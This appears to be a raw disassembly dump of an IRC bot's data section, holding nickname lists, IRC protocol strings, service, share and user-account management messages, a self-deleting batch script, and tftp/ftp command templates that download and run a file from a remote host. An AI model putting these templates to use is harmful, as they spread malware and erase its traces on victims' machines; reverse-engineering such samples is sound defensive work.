aIzmir39m db 'Izmir39m',0 ; DATA XREF: .data:0044F114�o
align 4
aAlbina db 'albina',0 ; DATA XREF: .data:0044F118�o
align 4
aAyla db 'AYLA-',0 ; DATA XREF: .data:0044F11C�o
align 4
off_44F70C dd offset byte_457441 ; DATA XREF: .data:0044F120�o
aAnkh db 'ankh',0 ; DATA XREF: .data:0044F124�o
align 4
aDonjuanm db 'Donjuanm',0 ; DATA XREF: .data:0044F128�o
align 4
aBogac db 'bogac',0 ; DATA XREF: .data:0044F12C�o
align 4
aAlpay34m db 'alpay34m',0 ; DATA XREF: .data:0044F130�o
align 4
aCongueror db 'CoNGuERoR',0 ; DATA XREF: .data:0044F134�o
align 4
aDenizlim db 'DenizliM',0 ; DATA XREF: .data:0044F138�o
align 10h
aBerk19m db 'Berk19m',0 ; DATA XREF: .data:0044F13C�o
aDevran db 'devran',0 ; DATA XREF: .data:0044F140�o
align 10h
aArda db 'arda',0 ; DATA XREF: .data:0044F144�o
align 4
aKeyiflisert db 'keyifliSERT',0 ; DATA XREF: .data:0044F148�o
aMurat34M db 'murat34-m',0 ; DATA XREF: .data:0044F14C�o
align 10h
aHakan3 db 'hakan3',0 ; DATA XREF: .data:0044F150�o
align 4
aImirzali db 'IMIRZALI--',0 ; DATA XREF: .data:0044F154�o
align 4
aRamtha db 'RAMTHA',0 ; DATA XREF: .data:0044F158�o
align 4
aEmre db 'Emre--',0 ; DATA XREF: .data:0044F15C�o
align 4
aElmaazyok db 'elmaazyok',0 ; DATA XREF: .data:0044F160�o
align 10h
aEsmerkiz db 'Esmerkiz',0 ; DATA XREF: .data:0044F164�o
align 4
aKebikec db 'kebikec',0 ; DATA XREF: .data:0044F168�o
aFlord db 'FLoRD',0 ; DATA XREF: .data:0044F16C�o
align 4
aHoly db 'holy',0 ; DATA XREF: .data:0044F170�o
align 4
aMahinur db 'MAHINUR',0 ; DATA XREF: .data:0044F174�o
aSadikaellesme db 'SaDIkaEllesme',0 ; DATA XREF: .data:0044F178�o
align 4
aAykut1 db 'aykut1',0 ; DATA XREF: .data:0044F17C�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .data:0044F180�o
align 10h
aSeviseli db 'SeViSeLi',0 ; DATA XREF: .data:0044F184�o
align 4
aSugarboy db 'SUGARBOY-',0 ; DATA XREF: .data:0044F188�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .data:0044F18C�o
aKumul db 'kumul',0 ; DATA XREF: .data:0044F190�o
align 4
aAdalim db 'ADALIM',0 ; DATA XREF: .data:0044F194�o
align 10h
aUmut db 'umut-',0 ; DATA XREF: .data:0044F198�o
align 4
aAnk32M db 'ANK-32-M',0 ; DATA XREF: .data:0044F19C�o
align 4
aDjspace db 'DJSPACE',0 ; DATA XREF: .data:0044F1A0�o
aAnkar db 'Ankar',0 ; DATA XREF: .data:0044F1A4�o
align 4
aFenerlee db 'FeNeRLee',0 ; DATA XREF: .data:0044F1A8�o
align 10h
aHayran db 'hayran',0 ; DATA XREF: .data:0044F1AC�o
align 4
aAngelgirl db 'angelgirl',0 ; DATA XREF: .data:0044F1B0�o
align 4
aKapk db 'kapk',0 ; DATA XREF: .data:0044F1B4�o
align 4
aAchilles db 'Achilles',0 ; DATA XREF: .data:0044F1B8�o
align 4
aTegmen db 'TEGMEN',0 ; DATA XREF: .data:0044F1BC�o
align 10h
aKotan db 'kotan',0 ; DATA XREF: .data:0044F1C0�o
align 4
aSevda db 'sevda',0 ; DATA XREF: .data:0044F1C4�o
align 10h
off_44F8A0 dd offset byte_4B5245 ; DATA XREF: .data:0044F1C8�o
aAlcatras db 'alcatras',0 ; DATA XREF: .data:0044F1CC�o
align 10h
aA44m db 'a44m',0 ; DATA XREF: .data:0044F1D0�o
align 4
aBirsen db 'birsen',0 ; DATA XREF: .data:0044F1D4�o
align 10h
aYabanc db 'yabanc',0 ; DATA XREF: .data:0044F1D8�o
align 4
aDevre db 'devre',0 ; DATA XREF: .data:0044F1DC�o
align 10h
aErkan db 'erkan',0 ; DATA XREF: .data:0044F1E0�o
align 4
aAnkm db 'ankM',0 ; DATA XREF: .data:0044F1E4�o
align 10h
aAdem28 db 'Adem28',0 ; DATA XREF: .data:0044F1E8�o
align 4
aMaxsilla db 'maxsilla',0 ; DATA XREF: .data:0044F1EC�o
align 4
aM41ist db 'M41IST',0 ; DATA XREF: .data:0044F1F0�o
align 4
aAdamm33 db 'AdAMM33',0 ; DATA XREF: .data:0044F1F4�o
aFirtina db 'firtina',0 ; DATA XREF: .data:0044F1F8�o
aAta29 db 'Ata29',0 ; DATA XREF: .data:0044F1FC�o
align 4
aKoray db 'KORAY',0 ; DATA XREF: .data:0044F200�o
align 4
aAkden db 'akden',0 ; DATA XREF: .data:0044F204�o
align 4
aIzmirlm db 'izmirlm',0 ; DATA XREF: .data:0044F208�o
aUla db 'ula',0 ; DATA XREF: .data:0044F20C�o
aNeHaber db 'NE-HABER',0 ; DATA XREF: .data:0044F210�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .data:0044F214�o
align 4
aTropikal db 'tropikal',0 ; DATA XREF: .data:0044F218�o
align 4
aCool30m db 'cool30m',0 ; DATA XREF: .data:0044F21C�o
aCem39 db 'cem39',0 ; DATA XREF: .data:0044F220�o
align 4
aRerpjj db 'RERPJJ',0 ; DATA XREF: .data:0044F224�o
align 4
aTeoman db 'TEOMAN```',0 ; DATA XREF: .data:0044F228�o
align 4
aDallas43m db 'DALLAS43M',0 ; DATA XREF: .data:0044F22C�o
align 4
aPrometheus db 'prometheus',0 ; DATA XREF: .data:0044F230�o
align 10h
aMaveRIck db 'MaVe{R}icK',0 ; DATA XREF: .data:0044F234�o
align 4
aAdamm db 'ADAMM',0 ; DATA XREF: .data:0044F238�o
align 4
aCumhur29 db 'cumhur29',0 ; DATA XREF: .data:0044F23C�o
align 10h
aWantedlove db 'WANTEDLOVE',0 ; DATA XREF: .data:0044F240�o
align 4
aSex_1 db 'sex',0 ; DATA XREF: .data:off_44F244�o
aLez db 'lez',0 ; DATA XREF: .data:0044F248�o
aZex db 'zex',0 ; DATA XREF: .data:0044F24C�o
aTree db 'tree',0 ; DATA XREF: .data:0044F250�o
align 10h
aBad db 'bad',0 ; DATA XREF: .data:0044F254�o
aLag db 'lag',0 ; DATA XREF: .data:0044F258�o
aTambe db '|tambe|',0 ; DATA XREF: .data:0044F25C�o
aWoh db '|woh|',0 ; DATA XREF: .data:0044F260�o
align 4
aTot db '-|tot|',0 ; DATA XREF: .data:0044F264�o
align 10h
aSuck db '|suck|',0 ; DATA XREF: .data:0044F268�o
align 4
aLuck db '|luck|',0 ; DATA XREF: .data:0044F26C�o
align 10h
aHub db '{hub}',0 ; DATA XREF: .data:0044F270�o
align 4
aSex_0 db '{sex}',0 ; DATA XREF: .data:0044F274�o
align 10h
aGens db '{gens|',0 ; DATA XREF: .data:0044F278�o
align 4
aLuvuF db '||luvu-f|',0 ; DATA XREF: .data:0044F27C�o
align 4
aWiked db '|wiked|',0 ; DATA XREF: .data:0044F280�o
aSick db 'sick}}',0 ; DATA XREF: .data:0044F284�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .data:0044F288�o
align 4
aQ8A db '|q8|a',0 ; DATA XREF: .data:0044F28C�o
align 10h
aB: ; DATA XREF: .data:0044F290�o
unicode 0, <b>,0
aC_4: ; DATA XREF: .data:0044F294�o
unicode 0, <c>,0
aD_2: ; DATA XREF: .data:0044F298�o
unicode 0, <d>,0
aE_0: ; DATA XREF: .data:0044F29C�o
unicode 0, <e>,0
aF: ; DATA XREF: .data:0044F2A0�o
unicode 0, <f>,0
aG: ; DATA XREF: .data:0044F2A4�o
unicode 0, <g>,0
asc_44FA58: ; DATA XREF: .data:0044F2A8�o
unicode 0, <h>,0
aI_1: ; DATA XREF: .data:0044F2AC�o
unicode 0, <i>,0
a__11: ; DATA XREF: .data:0044F2B0�o
unicode 0, <_>,0
aJ_1: ; DATA XREF: .data:0044F2B4�o
unicode 0, <j>,0
aK_0: ; DATA XREF: .data:0044F2B8�o
unicode 0, <k>,0
asc_44FA6C: ; DATA XREF: .data:0044F2BC�o
unicode 0, <l>,0
aM_2: ; DATA XREF: .data:0044F2C0�o
unicode 0, <m>,0
aN_0: ; DATA XREF: .data:0044F2C4�o
unicode 0, <n>,0
aO_0: ; DATA XREF: .data:0044F2C8�o
unicode 0, <o>,0
aP_0: ; DATA XREF: .data:0044F2CC�o
unicode 0, <p>,0
aQ_0: ; DATA XREF: .data:0044F2D0�o
unicode 0, <q>,0
aRs db 'rs',0 ; DATA XREF: .data:0044F2D4�o
align 4
aT_0: ; DATA XREF: .data:0044F2D8�o
unicode 0, <t>,0
aU_0: ; DATA XREF: .data:0044F2DC�o
unicode 0, <u>,0
aV_0: ; DATA XREF: .data:0044F2E0�o
unicode 0, <v>,0
aW: ; DATA XREF: .data:0044F2E4�o
unicode 0, <w>,0
asc_44FA98: ; DATA XREF: .data:0044F2E8�o
unicode 0, <x>,0
aY: ; DATA XREF: .data:0044F2EC�o
unicode 0, <y>,0
aZ: ; DATA XREF: .data:0044F2F0�o
unicode 0, <z>,0
aHappy db 'happy',0 ; DATA XREF: .data:0044F2F4�o
align 4
aRg db 'rg',0 ; DATA XREF: .data:0044F2F8�o
align 10h
aTy db 'ty',0 ; DATA XREF: .data:0044F2FC�o
align 4
aGf db 'gf',0 ; DATA XREF: .data:0044F300�o
align 4
aRt db 'rt',0 ; DATA XREF: .data:0044F304�o
align 4
aSdf db 'sdf',0 ; DATA XREF: .data:0044F308�o
aUi db 'ui',0 ; DATA XREF: .data:0044F30C�o
align 4
aLuvy db 'luvy',0 ; DATA XREF: .data:0044F310�o
align 4
aTrimy db 'trimy',0 ; DATA XREF: .data:0044F314�o
align 4
aTruck db 'truck',0 ; DATA XREF: .data:0044F318�o
align 4
aMuckc db 'muckc',0 ; DATA XREF: .data:0044F31C�o
align 4
aZ_0: ; DATA XREF: .data:0044F320�o
unicode 0, <z>,0
aG_0: ; DATA XREF: .data:0044F324�o
unicode 0, <g>,0
aS_39: ; DATA XREF: .data:0044F328�o
unicode 0, <s>,0
aQ_1: ; DATA XREF: .data:0044F32C�o
unicode 0, <q>,0
aBrb db 'BRB',0 ; DATA XREF: .data:0044F330�o
aBbl db '|bbl',0 ; DATA XREF: .data:0044F334�o
align 10h
a___0 db '_|_',0 ; DATA XREF: .data:0044F340�o
aF_0: ; DATA XREF: .data:0044F354�o
unicode 0, <F>,0
aM_3: ; DATA XREF: .data:0044F358�o
unicode 0, <M>,0
aLuvu db 'LUVU',0 ; DATA XREF: .data:0044F35C�o
align 4
aSad db 'Sad',0 ; DATA XREF: .data:0044F360�o
aF_1 db '^^^f^',0 ; DATA XREF: .data:0044F364�o
align 10h
aB_0: ; DATA XREF: .data:0044F368�o
unicode 0, <b>,0
aSleeping db 'Sleeping',0 ; DATA XREF: .data:0044F370�o
align 10h
aFuck_0 db 'Fuck',0 ; DATA XREF: .data:0044F37C�o
align 4
aFree_0 db 'Free',0 ; DATA XREF: .data:0044F380�o
align 10h
asc_44FB40: ; DATA XREF: .data:0044F38C�o
unicode 0, <X>,0
aBoy db 'BOY',0 ; DATA XREF: .data:0044F394�o
aGirl_0 db 'GIRL',0 ; DATA XREF: .data:0044F398�o
align 10h
aGurl db 'gurl',0 ; DATA XREF: .data:0044F39C�o
align 4
aShit db 'shit',0 ; DATA XREF: .data:0044F3A0�o
align 10h
aAha db 'aha',0 ; DATA XREF: .data:0044F3A4�o
aYeah db 'yeah',0 ; DATA XREF: .data:0044F3A8�o
align 4
aMuha db 'muha',0 ; DATA XREF: .data:0044F3AC�o
align 4
aMof0 db 'mof0',0 ; DATA XREF: .data:0044F3B0�o
align 4
aMofo db 'mofo',0 ; DATA XREF: .data:0044F3B4�o
align 4
aTot_0 db 'tot',0 ; DATA XREF: .data:0044F3B8�o
aLol db 'lol',0 ; DATA XREF: .data:0044F3BC�o
aLoloA db 'lolo|a|',0 ; DATA XREF: .data:0044F3C0�o
aSex4free db '|sex4free|',0 ; DATA XREF: .data:0044F3C4�o
align 10h
a4us db '|4us|',0 ; DATA XREF: .data:0044F3C8�o
align 4
a4you db '{4you}',0 ; DATA XREF: .data:0044F3CC�o
align 10h
a4u db '|4u|',0 ; DATA XREF: .data:0044F3D0�o
align 4
a5u db '5u',0 ; DATA XREF: .data:0044F3D4�o
align 4
a6u db '6u',0 ; DATA XREF: .data:0044F3D8�o
align 10h
; char asc_44FBC0[]
asc_44FBC0 db 0Ah,0 ; DATA XREF: sub_4182F9+6�o
align 4
; char asc_44FBC4[]
asc_44FBC4 db ' ',0 ; DATA XREF: sub_418340+C�o
align 4
; char asc_44FBC8[]
asc_44FBC8 db ' ',0 ; DATA XREF: sub_418340:loc_418366�o
align 4
; char aPing_1[]
aPing_1 db 'PING',0 ; DATA XREF: sub_418340+52�o
align 4
aPongS_0 db 'PONG %s',0Ah,0 ; DATA XREF: sub_418340+63�o
align 10h
; char a433[]
a433 db '433',0 ; DATA XREF: sub_418340:loc_4183AA�o
; char a432[]
a432 db '432',0 ; DATA XREF: sub_418340+7B�o
; char aNickS_9[]
aNickS_9 db 'NICK %s',0Ah,0 ; DATA XREF: sub_418340+B3�o
align 4
; char aNickSUserSHotm[]
aNickSUserSHotm db 'NICK %s',0Ah ; DATA XREF: sub_41842D+9B�o
db 'USER %s "hotmail.com" "127.0.0.1" :%s',0Ah,0
align 4
; char a__3[]
a__3 db '-|`_\{[]}',0 ; DATA XREF: sub_418650+BC�o
; sub_418650+175�r ...
align 10h
dword_44FC30 dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0 ; DATA XREF: .text:00418B3D�o
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_44FC7C dd 3000005h, 10h, 18h, 1, 3 dup(0) ; DATA XREF: .text:00418B7C�o
dword_44FC98 dd 975201B0h, 11D059CAh, 0A000D5A8h, 51800DC9h, 0
; DATA XREF: .text:00418BB1�o
dword_44FCAC dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
; DATA XREF: .text:00418BD8�o
; char aSErrorSD_[]
aSErrorSD_ db '%s Error: %s <%d>.',0 ; DATA XREF: sub_418E65+72�o
align 4
aMirc_2 db 'mIRC',0 ; DATA XREF: sub_418F2A+5�o
align 4
aMirc_3 db 'mIRC',0 ; DATA XREF: sub_418F2A+18�o
align 4
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_418FAF+1C�o
align 4
aSS_11 db '%s %s',0 ; DATA XREF: .text:00419098�o
align 4
aSeshutdownpriv db 'SeShutdownPrivilege',0 ; DATA XREF: sub_4190D4+2�o
; char aSdel_bat[]
aSdel_bat db '%sdel.bat',0 ; DATA XREF: sub_4190F6+48�o
align 4
; char a[]
a@echoOffRepeat db '@echo off',0Dh,0Ah ; DATA XREF: sub_4190F6+85�o
db ':repeat',0Dh,0Ah
db 'del "%%1"',0Dh,0Ah
db 'if exist "%%1" goto repeat',0Dh,0Ah
db 'del "%s"',0
; char aComspecCSS[]
aComspecCSS db '%%comspec%% /c %s %s',0 ; DATA XREF: sub_4190F6+140�o
align 4
; char asc_44FD78[]
asc_44FD78 db '-' ; DATA XREF: sub_41927E+5C�o
db 3, 34h, 2
dd 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h, 65726165h
dd 64h
unk_44FD94 db 2Dh ; - ; DATA XREF: sub_41927E+8F�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aFailedWithErro db '- failed with error code %d',0
align 4
; char asc_44FDBC[]
asc_44FDBC db '-' ; DATA XREF: sub_41927E+9C�o
db 3, 34h, 2
db 6Ch ; l
db 6Fh, 67h, 2
db 3
aOperatingSyste db '- operating system is not supported',0
align 4
aTftpISGetSS db 'tftp -i %s get %s &%s',0Dh,0Ah,0 ; DATA XREF: .text:004193DE�o
aEchoOpenSDOE_0 db 'echo open %s %d > o&echo user 1 1 >> o &echo get %s >> o &echo qu'
; DATA XREF: .text:00419407�o
db 'it >> o &ftp -n -s:o &%s',0Dh,0Ah,0
aNetapi32_dll_0 db 'netapi32.dll',0 ; DATA XREF: sub_419471+58�o
align 10h
aNetmessagebu_0 db 'NetMessageBufferSend',0 ; DATA XREF: sub_419471+65�o
align 4
off_44FE88 dd offset dword_44FEDC ; DATA XREF: sub_41958E+60�r
; sub_419965+51�r ...
off_44FE8C dd offset aAdded ; DATA XREF: sub_41958E+2D�r
; sub_419965+83�r ...
; "Added"
dword_44FE90 dd 0 ; DATA XREF: sub_41958E+18�r
dd offset aDelete_1 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1
dd offset aPause_0 ; "Pause"
dd offset aPaused_0 ; "Paused"
dd 2
dd offset aContinue_0 ; "Continue"
dd offset aContinued ; "Continued"
dd 3
dword_44FEDC dd 646441h ; DATA XREF: .data:off_44FE88�o
aAdded db 'Added',0 ; DATA XREF: .data:off_44FE8C�o
align 4
aDelete_1 db 'Delete',0 ; DATA XREF: .data:0044FE94�o
align 10h
aDeleted db 'Deleted',0 ; DATA XREF: .data:0044FE98�o
aList_1 db 'List',0 ; DATA XREF: .data:0044FEA0�o
align 10h
aListed db 'Listed',0 ; DATA XREF: .data:0044FEA4�o
align 4
aStart_0 db 'Start',0 ; DATA XREF: .data:0044FEAC�o
align 10h
aStarted db 'Started',0 ; DATA XREF: .data:0044FEB0�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:0044FEB8�o
align 10h
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0044FEBC�o
aPause_0 db 'Pause',0 ; DATA XREF: .data:0044FEC4�o
align 10h
aPaused_0 db 'Paused',0 ; DATA XREF: .data:0044FEC8�o
align 4
aContinue_0 db 'Continue',0 ; DATA XREF: .data:0044FED0�o
align 4
aContinued db 'Continued',0 ; DATA XREF: .data:0044FED4�o
align 10h
; char asc_44FF50[]
asc_44FF50 db '-' ; DATA XREF: sub_41958E+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
unk_44FF6C db 2Dh ; - ; DATA XREF: sub_41958E+51�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 4
; char asc_44FF98[]
asc_44FF98 db '-' ; DATA XREF: sub_41958E+67�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_4196AA:loc_419783�o
align 4
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_4196AA:loc_419704�o
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_4196AA+3C�o
align 10h
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_4196AA:loc_4196FA�o
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_4196AA:loc_41970E�o
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_4196AA:loc_419758�o
align 4
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_4196AA+8F�o
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_4196AA:loc_41978A�o
db 'marked for deletion.',0
align 4
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_4196AA:loc_419791�o
align 4
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_4196AA:loc_419798�o
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_4196AA:loc_41979F�o
align 10h
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_4196AA:loc_4197A6�o
db ' correct access rights.',0
align 4
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_4196AA:loc_4197AD�o
align 4
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_4196AA:loc_419743�o
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_4196AA:loc_41974A�o
db 'tServiceCtrlDispatcher.',0
align 4
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_4196AA:loc_419718�o
db 'dependent on it.',0
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_4196AA:loc_4196F0�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_4196AA:loc_419751�o
db ' the service.',0
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_4196AA:loc_4197B4�o
db 'the state of the service.',0
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_4196AA:loc_4197BB�o
align 4
; char aTheSystemIsShu[]
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_4196AA:loc_4197C2�o
align 4
; char aAnUnknownError[]
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_4196AA+12C�o
align 4
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_419828+25�o
align 4
; char aStopped[]
aStopped db ' Stopped',0 ; DATA XREF: sub_419828:loc_4198F4�o
aStarting db ' Starting',0 ; DATA XREF: sub_419828:loc_4198ED�o
aStoping db ' Stoping',0 ; DATA XREF: sub_419828:loc_4198E6�o
aRunning db ' Running',0 ; DATA XREF: sub_419828:loc_4198DF�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_419828:loc_4198D8�o
aPausing db ' Pausing',0 ; DATA XREF: sub_419828:loc_4198D1�o
aPaused db ' Paused',0 ; DATA XREF: sub_419828:loc_4198CA�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_419828+9B�o
; char aSSS_2[]
aSSS_2 db '%s: %s (%s)',0 ; DATA XREF: sub_419828+EB�o
; char asc_4504F4[]
asc_4504F4 db '-' ; DATA XREF: sub_419965+8A�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 68732073h, 3A657261h, 73252720h
dd 27h
; char asc_450510[]
asc_450510 db '-' ; DATA XREF: sub_419965+58�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 4
; char asc_45053C[]
asc_45053C db '-' ; DATA XREF: sub_419965+AC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 10h
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_419B5B+26�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_419B5B+B5�o
aNo db 'No',0 ; DATA XREF: sub_419B5B+BC�o
align 10h
; char a14s24s6u4s[]
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_419B5B+D0�o
align 4
; char asc_4505B8[]
asc_4505B8 db '-' ; DATA XREF: sub_419B5B+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 10h
; char asc_4505E0[]
asc_4505E0 db '-' ; DATA XREF: sub_419C7C+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 10h
; char asc_450600[]
asc_450600 db '-' ; DATA XREF: sub_419C7C+95�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 10h
; char asc_450630[]
asc_450630 db '-' ; DATA XREF: sub_419C7C+B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
; char aAccountS[]
aAccountS db 'Account: %S',0 ; DATA XREF: sub_419DC3+50�o
; char aFullNameS[]
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_419DC3+84�o
align 4
; char aUserCommentS[]
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_419DC3+AF�o
align 4
; char aCommentS[]
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_419DC3+DA�o
aGuest db 'Guest',0 ; DATA XREF: sub_419DC3:loc_419EE2�o
align 4
aUser_3 db 'User',0 ; DATA XREF: sub_419DC3:loc_419EDB�o
align 4
aAdministrator db 'Administrator',0 ; DATA XREF: sub_419DC3:loc_419ED4�o
align 4
aUnknown_1 db 'Unknown',0 ; DATA XREF: sub_419DC3+10A�o
; char aPrivilegeLevel[]
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_419DC3+12B�o
; char aAuthFlagsD[]
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_419DC3+156�o
align 10h
; char aHomeDirectoryS[]
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_419DC3+181�o
align 4
; char aParametersS[]
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_419DC3+1AC�o
align 4
; char aPasswordAgeD[]
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_419DC3+1D7�o
align 4
; char aBadPasswordCou[]
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_419DC3+202�o
align 10h
; char aNumberOfLogins[]
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_419DC3+22D�o
align 4
; char aLastLogonD[]
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_419DC3+258�o
align 4
; char aLastLogoffD[]
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_419DC3+283�o
; char aLogonServerS[]
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_419DC3+2AE�o
align 4
; char aWorkstationsS[]
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_419DC3+2D9�o
align 10h
; char aCountryCodeD[]
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_419DC3+304�o
align 4
; char aUserSLanguageD[]
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_419DC3+32F�o
; char aMax_StorageD[]
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_419DC3+35A�o
align 4
; char aUnitsPerWeekD[]
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_419DC3+385�o
align 10h
; char asc_4507E0[]
asc_4507E0 db '-' ; DATA XREF: sub_419DC3+3AF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41A1AC+29�o
; char asc_450828[]
asc_450828 db '-' ; DATA XREF: sub_41A1AC+F7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 4
; char aS_30[]
aS_30 db ' %S',0 ; DATA XREF: sub_41A1AC+BE�o
align 4
; char asc_45085C[]
asc_45085C db '-' ; DATA XREF: sub_41A1AC+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
; char aTotalUsersFoun[]
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41A1AC+14F�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_41A32C:loc_41A38F�o
align 4
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_41A32C:loc_41A3D0�o
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_41A32C:loc_41A399�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_41A32C+3B�o
align 10h
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_41A32C:loc_41A385�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_41A32C:loc_41A37B�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_41A32C:loc_41A371�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_41A32C:loc_41A43B�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_41A32C+89�o
align 10h
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_41A32C:loc_41A3BF�o
align 4
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_41A32C:loc_41A3C9�o
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_41A32C:loc_41A434�o
align 4
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_41A32C+CF�o
db ' the domain.',0
align 4
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_41A32C:loc_41A409�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_41A32C:loc_41A402�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_41A32C:loc_41A410�o
db 'ord policy requirement.)',0
align 4
; char aNetworkConnect[]
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_41A32C:loc_41A449�o
align 4
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_41A32C:loc_41A3D7�o
